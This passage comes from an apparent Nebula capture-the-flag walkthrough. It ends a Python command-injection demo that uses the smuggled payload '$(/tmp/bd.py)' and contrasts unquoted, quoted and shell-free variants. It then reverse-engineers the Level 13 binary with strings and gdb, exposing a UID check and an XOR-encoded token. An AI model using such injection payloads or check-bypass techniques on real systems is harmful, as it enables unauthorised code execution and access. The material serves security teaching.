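if __name__ == "__main__":
    payload = "$(/tmp/bd.py)"
    print(build_command(payload))         # the shell would run /tmp/bd.py
    print(build_command_quoted(payload))  # the payload stays a plain string
    print(hash_without_shell(payload))
```

<p>Only the first variant hands attacker-controlled text to the shell for interpretation. The last one avoids spawning a shell at all, which is usually the more robust choice.</p>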
<h2>Level 13 - Using gdb to trace a program</h2>
<p>In this level the code checks whether our user ID is 1000. If so, it proceeds to give us an
access token for the <code>flag13</code> account. But the token must be somewhere in the binary, otherwise
it couldn't be printed out (assuming it isn't retrieved from somewhere else).</p>
<p>A quick check with <code>strings flag13</code> shows us:</p>
<div class="highlight"><pre><span></span><code>level13@nebula:/home/flag13$ strings flag13
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
exit
puts
__stack_chk_fail
printf
getuid
__libc_start_main
GLIBC_2.4
GLIBC_2.0
PTRhp
UWVS
[^_]
Security failure detected. UID %d started us, we expect %d
The system administrators will be notified of this violation
8mjomjh8wml;bwnh8jwbbnnwi;>;88?o;9ob
your token is %s
;*2$"(
</code></pre></div>
<p>The string <code>8mjomjh8wml;bwnh8jwbbnnwi;>;88?o;9ob</code> looks like a token. But it isn't the password for the <code>flag13</code> account.</p>
<p>So let's play with the binary with gdb and disassemble it:</p>
<div class="highlight"><pre><span></span><code><span class="p">(</span><span class="n">gdb</span><span class="p">)</span><span class="w"> </span><span class="k">set</span><span class="w"> </span><span class="n">disassembly</span><span class="o">-</span><span class="n">flavor</span><span class="w"> </span><span class="n">intel</span><span class="w"></span>
<span class="p">(</span><span class="n">gdb</span><span class="p">)</span><span class="w"> </span><span class="n">disassemble</span><span class="w"> </span><span class="n">main</span><span class="w"></span>
<span class="k">Dump</span><span class="w"> </span><span class="k">of</span><span class="w"> </span><span class="n">assembler</span><span class="w"> </span><span class="n">code</span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="k">function</span><span class="w"> </span><span class="nl">main</span><span class="p">:</span><span class="w"></span>
<span class="mh">0x080484c4</span><span class="w"> </span><span class="o"><+</span><span class="mi">0</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">push</span><span class="w"> </span><span class="n">ebp</span><span class="w"></span>
<span class="mh">0x080484c5</span><span class="w"> </span><span class="o"><+</span><span class="mi">1</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ebp</span><span class="p">,</span><span class="n">esp</span><span class="w"></span>
<span class="mh">0x080484c7</span><span class="w"> </span><span class="o"><+</span><span class="mi">3</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">push</span><span class="w"> </span><span class="n">edi</span><span class="w"></span>
<span class="mh">0x080484c8</span><span class="w"> </span><span class="o"><+</span><span class="mi">4</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">push</span><span class="w"> </span><span class="n">ebx</span><span class="w"></span>
<span class="mh">0x080484c9</span><span class="w"> </span><span class="o"><+</span><span class="mi">5</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="ow">and</span><span class="w"> </span><span class="n">esp</span><span class="p">,</span><span class="mh">0xfffffff0</span><span class="w"></span>
<span class="mh">0x080484cc</span><span class="w"> </span><span class="o"><+</span><span class="mi">8</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">sub</span><span class="w"> </span><span class="n">esp</span><span class="p">,</span><span class="mh">0x130</span><span class="w"></span>
<span class="mh">0x080484d2</span><span class="w"> </span><span class="o"><+</span><span class="mi">14</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">ebp+0xc</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080484d5</span><span class="w"> </span><span class="o"><+</span><span class="mi">17</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x1c</span><span class="o">]</span><span class="p">,</span><span class="n">eax</span><span class="w"></span>
<span class="mh">0x080484d9</span><span class="w"> </span><span class="o"><+</span><span class="mi">21</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">ebp+0x10</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080484dc</span><span class="w"> </span><span class="o"><+</span><span class="mi">24</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x18</span><span class="o">]</span><span class="p">,</span><span class="n">eax</span><span class="w"></span>
<span class="mh">0x080484e0</span><span class="w"> </span><span class="o"><+</span><span class="mi">28</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="nl">gs</span><span class="p">:</span><span class="mh">0x14</span><span class="w"></span>
<span class="mh">0x080484e6</span><span class="w"> </span><span class="o"><+</span><span class="mi">34</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x12c</span><span class="o">]</span><span class="p">,</span><span class="n">eax</span><span class="w"></span>
<span class="mh">0x080484ed</span><span class="w"> </span><span class="o"><+</span><span class="mi">41</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">xor</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="n">eax</span><span class="w"></span>
<span class="mh">0x080484ef</span><span class="w"> </span><span class="o"><+</span><span class="mi">43</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">call</span><span class="w"> </span><span class="mh">0x80483c0</span><span class="w"> </span><span class="o"><</span><span class="n">getuid</span><span class="nv">@plt</span><span class="o">></span><span class="w"></span>
<span class="mh">0x080484f4</span><span class="w"> </span><span class="o"><+</span><span class="mi">48</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">cmp</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="mh">0x3e8</span><span class="w"></span>
<span class="mh">0x080484f9</span><span class="w"> </span><span class="o"><+</span><span class="mi">53</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">je</span><span class="w"> </span><span class="mh">0x8048531</span><span class="w"> </span><span class="o"><</span><span class="n">main</span><span class="o">+</span><span class="mi">109</span><span class="o">></span><span class="w"></span>
<span class="mh">0x080484fb</span><span class="w"> </span><span class="o"><+</span><span class="mi">55</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">call</span><span class="w"> </span><span class="mh">0x80483c0</span><span class="w"> </span><span class="o"><</span><span class="n">getuid</span><span class="nv">@plt</span><span class="o">></span><span class="w"></span>
<span class="mh">0x08048500</span><span class="w"> </span><span class="o"><+</span><span class="mi">60</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">edx</span><span class="p">,</span><span class="mh">0x80486d0</span><span class="w"></span>
<span class="mh">0x08048505</span><span class="w"> </span><span class="o"><+</span><span class="mi">65</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x8</span><span class="o">]</span><span class="p">,</span><span class="mh">0x3e8</span><span class="w"></span>
<span class="mh">0x0804850d</span><span class="w"> </span><span class="o"><+</span><span class="mi">73</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x4</span><span class="o">]</span><span class="p">,</span><span class="n">eax</span><span class="w"></span>
<span class="mh">0x08048511</span><span class="w"> </span><span class="o"><+</span><span class="mi">77</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp</span><span class="o">]</span><span class="p">,</span><span class="n">edx</span><span class="w"></span>
<span class="mh">0x08048514</span><span class="w"> </span><span class="o"><+</span><span class="mi">80</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">call</span><span class="w"> </span><span class="mh">0x80483a0</span><span class="w"> </span><span class="o"><</span><span class="n">printf</span><span class="nv">@plt</span><span class="o">></span><span class="w"></span>
<span class="mh">0x08048519</span><span class="w"> </span><span class="o"><+</span><span class="mi">85</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp</span><span class="o">]</span><span class="p">,</span><span class="mh">0x804870c</span><span class="w"></span>
<span class="mh">0x08048520</span><span class="w"> </span><span class="o"><+</span><span class="mi">92</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">call</span><span class="w"> </span><span class="mh">0x80483d0</span><span class="w"> </span><span class="o"><</span><span class="n">puts</span><span class="nv">@plt</span><span class="o">></span><span class="w"></span>
<span class="mh">0x08048525</span><span class="w"> </span><span class="o"><+</span><span class="mi">97</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp</span><span class="o">]</span><span class="p">,</span><span class="mh">0x1</span><span class="w"></span>
<span class="mh">0x0804852c</span><span class="w"> </span><span class="o"><+</span><span class="mi">104</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">call</span><span class="w"> </span><span class="mh">0x80483f0</span><span class="w"> </span><span class="o"><</span><span class="k">exit</span><span class="nv">@plt</span><span class="o">></span><span class="w"></span>
<span class="mh">0x08048531</span><span class="w"> </span><span class="o"><+</span><span class="mi">109</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">lea</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="o">[</span><span class="n">esp+0x2c</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x08048535</span><span class="w"> </span><span class="o"><+</span><span class="mi">113</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ebx</span><span class="p">,</span><span class="n">eax</span><span class="w"></span>
<span class="mh">0x08048537</span><span class="w"> </span><span class="o"><+</span><span class="mi">115</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="mh">0x0</span><span class="w"></span>
<span class="mh">0x0804853c</span><span class="w"> </span><span class="o"><+</span><span class="mi">120</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">edx</span><span class="p">,</span><span class="mh">0x40</span><span class="w"></span>
<span class="mh">0x08048541</span><span class="w"> </span><span class="o"><+</span><span class="mi">125</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">edi</span><span class="p">,</span><span class="n">ebx</span><span class="w"></span>
<span class="mh">0x08048543</span><span class="w"> </span><span class="o"><+</span><span class="mi">127</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ecx</span><span class="p">,</span><span class="n">edx</span><span class="w"></span>
<span class="mh">0x08048545</span><span class="w"> </span><span class="o"><+</span><span class="mi">129</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">rep</span><span class="w"> </span><span class="n">stos</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="nl">es</span><span class="p">:</span><span class="o">[</span><span class="n">edi</span><span class="o">]</span><span class="p">,</span><span class="n">eax</span><span class="w"></span>
<span class="mh">0x08048547</span><span class="w"> </span><span class="o"><+</span><span class="mi">131</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">edx</span><span class="p">,</span><span class="mh">0x804874c</span><span class="w"></span>
<span class="mh">0x0804854c</span><span class="w"> </span><span class="o"><+</span><span class="mi">136</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">lea</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="o">[</span><span class="n">esp+0x2c</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x08048550</span><span class="w"> </span><span class="o"><+</span><span class="mi">140</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ecx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">edx</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x08048552</span><span class="w"> </span><span class="o"><+</span><span class="mi">142</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax</span><span class="o">]</span><span class="p">,</span><span class="n">ecx</span><span class="w"></span>
<span class="mh">0x08048554</span><span class="w"> </span><span class="o"><+</span><span class="mi">144</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ecx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">edx+0x4</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x08048557</span><span class="w"> </span><span class="o"><+</span><span class="mi">147</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax+0x4</span><span class="o">]</span><span class="p">,</span><span class="n">ecx</span><span class="w"></span>
<span class="mh">0x0804855a</span><span class="w"> </span><span class="o"><+</span><span class="mi">150</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ecx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">edx+0x8</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x0804855d</span><span class="w"> </span><span class="o"><+</span><span class="mi">153</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax+0x8</span><span class="o">]</span><span class="p">,</span><span class="n">ecx</span><span class="w"></span>
<span class="mh">0x08048560</span><span class="w"> </span><span class="o"><+</span><span class="mi">156</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ecx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">edx+0xc</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x08048563</span><span class="w"> </span><span class="o"><+</span><span class="mi">159</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax+0xc</span><span class="o">]</span><span class="p">,</span><span class="n">ecx</span><span class="w"></span>
<span class="mh">0x08048566</span><span class="w"> </span><span class="o"><+</span><span class="mi">162</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ecx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">edx+0x10</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x08048569</span><span class="w"> </span><span class="o"><+</span><span class="mi">165</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax+0x10</span><span class="o">]</span><span class="p">,</span><span class="n">ecx</span><span class="w"></span>
<span class="mh">0x0804856c</span><span class="w"> </span><span class="o"><+</span><span class="mi">168</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ecx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">edx+0x14</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x0804856f</span><span class="w"> </span><span class="o"><+</span><span class="mi">171</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax+0x14</span><span class="o">]</span><span class="p">,</span><span class="n">ecx</span><span class="w"></span>
<span class="mh">0x08048572</span><span class="w"> </span><span class="o"><+</span><span class="mi">174</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ecx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">edx+0x18</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x08048575</span><span class="w"> </span><span class="o"><+</span><span class="mi">177</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax+0x18</span><span class="o">]</span><span class="p">,</span><span class="n">ecx</span><span class="w"></span>
<span class="mh">0x08048578</span><span class="w"> </span><span class="o"><+</span><span class="mi">180</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ecx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">edx+0x1c</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x0804857b</span><span class="w"> </span><span class="o"><+</span><span class="mi">183</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax+0x1c</span><span class="o">]</span><span class="p">,</span><span class="n">ecx</span><span class="w"></span>
<span class="mh">0x0804857e</span><span class="w"> </span><span class="o"><+</span><span class="mi">186</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">ecx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">edx+0x20</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x08048581</span><span class="w"> </span><span class="o"><+</span><span class="mi">189</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax+0x20</span><span class="o">]</span><span class="p">,</span><span class="n">ecx</span><span class="w"></span>
<span class="mh">0x08048584</span><span class="w"> </span><span class="o"><+</span><span class="mi">192</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">movzx</span><span class="w"> </span><span class="n">edx</span><span class="p">,</span><span class="n">BYTE</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">edx+0x24</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x08048588</span><span class="w"> </span><span class="o"><+</span><span class="mi">196</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">BYTE</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax+0x24</span><span class="o">]</span><span class="p">,</span><span class="n">dl</span><span class="w"></span>
<span class="mh">0x0804858b</span><span class="w"> </span><span class="o"><+</span><span class="mi">199</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x28</span><span class="o">]</span><span class="p">,</span><span class="mh">0x0</span><span class="w"></span>
<span class="mh">0x08048593</span><span class="w"> </span><span class="o"><+</span><span class="mi">207</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">jmp</span><span class="w"> </span><span class="mh">0x80485b4</span><span class="w"> </span><span class="o"><</span><span class="n">main</span><span class="o">+</span><span class="mi">240</span><span class="o">></span><span class="w"></span>
<span class="mh">0x08048595</span><span class="w"> </span><span class="o"><+</span><span class="mi">209</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">lea</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="o">[</span><span class="n">esp+0x2c</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x08048599</span><span class="w"> </span><span class="o"><+</span><span class="mi">213</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">add</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x28</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x0804859d</span><span class="w"> </span><span class="o"><+</span><span class="mi">217</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">movzx</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="n">BYTE</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080485a0</span><span class="w"> </span><span class="o"><+</span><span class="mi">220</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">edx</span><span class="p">,</span><span class="n">eax</span><span class="w"></span>
<span class="mh">0x080485a2</span><span class="w"> </span><span class="o"><+</span><span class="mi">222</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">xor</span><span class="w"> </span><span class="n">edx</span><span class="p">,</span><span class="mh">0x5a</span><span class="w"></span>
<span class="mh">0x080485a5</span><span class="w"> </span><span class="o"><+</span><span class="mi">225</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">lea</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="o">[</span><span class="n">esp+0x2c</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080485a9</span><span class="w"> </span><span class="o"><+</span><span class="mi">229</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">add</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x28</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080485ad</span><span class="w"> </span><span class="o"><+</span><span class="mi">233</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">BYTE</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax</span><span class="o">]</span><span class="p">,</span><span class="n">dl</span><span class="w"></span>
<span class="mh">0x080485af</span><span class="w"> </span><span class="o"><+</span><span class="mi">235</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">add</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x28</span><span class="o">]</span><span class="p">,</span><span class="mh">0x1</span><span class="w"></span>
<span class="mh">0x080485b4</span><span class="w"> </span><span class="o"><+</span><span class="mi">240</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">lea</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="o">[</span><span class="n">esp+0x2c</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080485b8</span><span class="w"> </span><span class="o"><+</span><span class="mi">244</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">add</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x28</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080485bc</span><span class="w"> </span><span class="o"><+</span><span class="mi">248</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">movzx</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="n">BYTE</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">eax</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080485bf</span><span class="w"> </span><span class="o"><+</span><span class="mi">251</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">test</span><span class="w"> </span><span class="n">al</span><span class="p">,</span><span class="n">al</span><span class="w"></span>
<span class="mh">0x080485c1</span><span class="w"> </span><span class="o"><+</span><span class="mi">253</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">jne</span><span class="w"> </span><span class="mh">0x8048595</span><span class="w"> </span><span class="o"><</span><span class="n">main</span><span class="o">+</span><span class="mi">209</span><span class="o">></span><span class="w"></span>
<span class="mh">0x080485c3</span><span class="w"> </span><span class="o"><+</span><span class="mi">255</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">eax</span><span class="p">,</span><span class="mh">0x8048771</span><span class="w"></span>
<span class="mh">0x080485c8</span><span class="w"> </span><span class="o"><+</span><span class="mi">260</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">lea</span><span class="w"> </span><span class="n">edx</span><span class="p">,</span><span class="o">[</span><span class="n">esp+0x2c</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080485cc</span><span class="w"> </span><span class="o"><+</span><span class="mi">264</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x4</span><span class="o">]</span><span class="p">,</span><span class="n">edx</span><span class="w"></span>
<span class="mh">0x080485d0</span><span class="w"> </span><span class="o"><+</span><span class="mi">268</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp</span><span class="o">]</span><span class="p">,</span><span class="n">eax</span><span class="w"></span>
<span class="mh">0x080485d3</span><span class="w"> </span><span class="o"><+</span><span class="mi">271</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">call</span><span class="w"> </span><span class="mh">0x80483a0</span><span class="w"> </span><span class="o"><</span><span class="n">printf</span><span class="nv">@plt</span><span class="o">></span><span class="w"></span>
<span class="mh">0x080485d8</span><span class="w"> </span><span class="o"><+</span><span class="mi">276</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">mov</span><span class="w"> </span><span class="n">edx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="o">[</span><span class="n">esp+0x12c</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080485df</span><span class="w"> </span><span class="o"><+</span><span class="mi">283</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">xor</span><span class="w"> </span><span class="n">edx</span><span class="p">,</span><span class="n">DWORD</span><span class="w"> </span><span class="n">PTR</span><span class="w"> </span><span class="nl">gs</span><span class="p">:</span><span class="mh">0x14</span><span class="w"></span>
<span class="mh">0x080485e6</span><span class="w"> </span><span class="o"><+</span><span class="mi">290</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">je</span><span class="w"> </span><span class="mh">0x80485ed</span><span class="w"> </span><span class="o"><</span><span class="n">main</span><span class="o">+</span><span class="mi">297</span><span class="o">></span><span class="w"></span>
<span class="mh">0x080485e8</span><span class="w"> </span><span class="o"><+</span><span class="mi">292</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="k">call</span><span class="w"> </span><span class="mh">0x80483b0</span><span class="w"> </span><span class="o"><</span><span class="n">__stack_chk_fail</span><span class="nv">@plt</span><span class="o">></span><span class="w"></span>
<span class="mh">0x080485ed</span><span class="w"> </span><span class="o"><+</span><span class="mi">297</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">lea</span><span class="w"> </span><span class="n">esp</span><span class="p">,</span><span class="o">[</span><span class="n">ebp-0x8</span><span class="o">]</span><span class="w"></span>
<span class="mh">0x080485f0</span><span class="w"> </span><span class="o"><+</span><span class="mi">300</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">pop</span><span class="w"> </span><span class="n">ebx</span><span class="w"></span>
<span class="mh">0x080485f1</span><span class="w"> </span><span class="o"><+</span><span class="mi">301</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">pop</span><span class="w"> </span><span class="n">edi</span><span class="w"></span>
<span class="mh">0x080485f2</span><span class="w"> </span><span class="o"><+</span><span class="mi">302</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">pop</span><span class="w"> </span><span class="n">ebp</span><span class="w"></span>
